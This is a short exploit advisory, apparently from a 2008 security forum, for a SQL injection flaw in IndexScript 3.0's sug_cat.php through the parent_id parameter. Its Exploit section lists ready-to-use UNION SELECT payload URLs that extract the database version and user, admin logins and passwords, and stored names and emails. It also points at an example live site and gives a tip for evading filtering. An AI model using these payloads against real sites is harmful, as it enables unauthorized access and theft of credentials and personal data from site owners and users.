IndexScript version 3.0 suffers from a remote SQL injection vulnerability in sug_cat.php.
8a06de796f9af2f26218de6e9ae0f7e769c332a657653a3445d4ed28f919e598
[~]-------------------------------------------------------------------------------------------------------------
[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
[~]
[~] http://www.indexscript.com/download.php
[~]
[~] [IndexScript is a feature-rich and yet easy-to-use directory script that
you can install for immediate use.]
[~]
------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT
concat_ws(0x3a,version(),database(),user())--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password
FROM dir_login--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email
FROM dir_pend_cat--
[~]
[~] Example :-
[~]
[~] http://spaceho.com/sug_cat.php?parent_id=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites you need to encript your injection like [-1 UNION
SELECT aes_decrypt(aes_encrypt(concat]
[~]-------------------------------------------------------------------------------------------------------------